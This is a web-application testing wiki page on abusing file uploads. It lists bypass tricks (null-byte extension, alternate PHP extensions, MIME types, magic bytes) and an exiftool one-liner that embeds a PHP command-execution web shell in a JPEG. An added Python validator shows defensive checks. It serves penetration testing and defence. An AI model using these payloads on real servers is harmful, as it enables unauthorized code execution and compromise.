File Uploads - CraigDonkin/Web-Application-Testing GitHub Wiki
---

Abusing file upload functionality
---

Attacks
- Upload/download malware
- Upload web shells
- Upload XSS
- Upload + directory traversal out of the web root
- Upload files that are large (denial of service)
- Upload arbitrary files (where the type is not checked, or the check is bypassed)

EICAR anti-virus test string (harmless; checks whether uploads are scanned):

```
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
```
- Upload a file with the extension changed to one that is accepted
  - I like to put it like `blah.exeA.pdf`
  - Intercept the request in Burp, find the `A` (hex 41) and replace it with `00`
  - Submit and see if the null byte bypasses the file extension check
- Set the file type to something accepted, such as `.pdf`
  - Intercept the request
  - Change the file type and the MIME type
  - Submit
Alternative PHP extensions to try:

- `php3`
- `php4`
- `php5`
- `php6`
- `pht`
- `phpt`
- `phtml`
- `pHp`
- `Php`
- `phP`
MIME types to try in the `Content-Type` header:

- `text/html`
- `text/plain`
- `text/richtext`
- `application/msword`
- `application/octet-stream`
- `application/pdf`
- `application/vnd.ms-excel`
- `application/x-compressed`
- `application/x-gzip`
- `application/x-javascript`
- `application/x-msdownload`
- `application/x-sh`
- `application/x-tar`
- `application/zip`
- `image/gif`
- `image/jpeg`
- `image/svg+xml`
- The server might check that a JPEG really is a JPEG, for example
- Try adding the format's magic bytes to the start of the file:

```
FF D8        # JPEG
25 50 44 46  # PDF
50 4B 03 04  # Zip
```

Writing into the JPEG comment field with exiftool:

```
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
```
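The checks the steps above try to bypass, and the ones that hold up, as an added example that is not from this wiki or any project it links: a Python upload validator that rejects null bytes in the filename, strips directory components, allow-lists the lowercased last extension, caps the size, checks the declared `Content-Type` and the magic bytes, and then stores the file under a random server-chosen name. `naive_extension_ok` shows the suffix-match check that the null-byte trick defeats. The `ALLOWED` table, `MAX_BYTES`, `SCRIPT_MARKERS`, the sample bytes and all function names are assumptions made up for this example.

```python
import os
import secrets
from dataclasses import dataclass

# Allow-list of accepted extensions -> (expected Content-Type, magic-byte prefix).
# Anything not listed (php, php3, pht, phtml, ...) is rejected, whatever its case.
# Assumed values for the example.
ALLOWED = {
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "png":  ("image/png", b"\x89PNG\r\n\x1a\n"),
    "pdf":  ("application/pdf", b"%PDF"),
}
MAX_BYTES = 5 * 1024 * 1024  # assumed size cap; oversized uploads are a DoS vector

# Text that has no business inside an image or PDF. A heuristic only: the real
# mitigation is never executing uploads (store them outside the web root and
# serve them with a fixed Content-Type and X-Content-Type-Options: nosniff).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")

# Constructed sample inputs (not real files).
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16 + b"\xff\xd9"
PDF_SAMPLE = b"%PDF-1.4\n%constructed\n%%EOF\n"


@dataclass
class Verdict:
    ok: bool
    reason: str
    stored_name: str = ""  # random server-chosen name; never the client's


def naive_extension_ok(filename: str, ext: str) -> bool:
    """The check many applications actually do: a suffix match on the raw name.
    It accepts 'blah.exe\\x00.pdf', but a C-level open() stops at the NUL and
    writes 'blah.exe', which is the null-byte bypass described above."""
    return filename.lower().endswith("." + ext)


def validate_upload(filename: str, content_type: str, data: bytes) -> Verdict:
    # 1. Null bytes and other control characters in a name are never legitimate.
    if any(ord(c) < 32 for c in filename):
        return Verdict(False, "control character in filename")
    # 2. Drop any directory part so '../' cannot move the file out of the upload dir.
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return Verdict(False, "no extension")
    # 3. Only the last extension counts, compared case-insensitively (pHp == php).
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return Verdict(False, f"extension .{ext} not allowed")
    expected_type, magic = ALLOWED[ext]
    # 4. Size cap before any further processing.
    if len(data) > MAX_BYTES:
        return Verdict(False, "file too large")
    # 5. The declared Content-Type is client-controlled but must still agree.
    if content_type.split(";")[0].strip().lower() != expected_type:
        return Verdict(False, f"Content-Type {content_type!r} does not match .{ext}")
    # 6. Magic bytes must match the format the extension claims.
    if not data.startswith(magic):
        return Verdict(False, "magic bytes do not match extension")
    # 7. Heuristic defence in depth against script text hidden in metadata.
    lowered = data.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        return Verdict(False, "embedded script marker")
    # 8. Accept under a random name; the client's name is discarded entirely.
    return Verdict(True, "accepted", f"{secrets.token_hex(16)}.{ext}")


if __name__ == "__main__":
    for name, ctype, body in [
        ("shell.php", "application/x-php", b"<?php echo 1; ?>"),
        ("blah.exe\x00.pdf", "application/pdf", PDF_SAMPLE),
        ("../../cat.jpg", "image/jpeg", JPEG_SAMPLE),
        ("cat.jpg", "image/jpeg", JPEG_SAMPLE + b"<?php echo 'x'; ?>"),
    ]:
        print(repr(name), validate_upload(name, ctype, body))
```

Even when every check passes, a valid JPEG can still carry arbitrary text in its comment field, so the accepted file must land outside the web root (or on storage that never executes anything) and be served with a fixed `Content-Type` and `X-Content-Type-Options: nosniff`; the `SCRIPT_MARKERS` scan is a heuristic, not a substitute for that.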
Links
---

- https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types
- https://www.eicar.org/?page_id=3950
- https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/
- https://www.garykessler.net/library/file_sigs.html
- http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html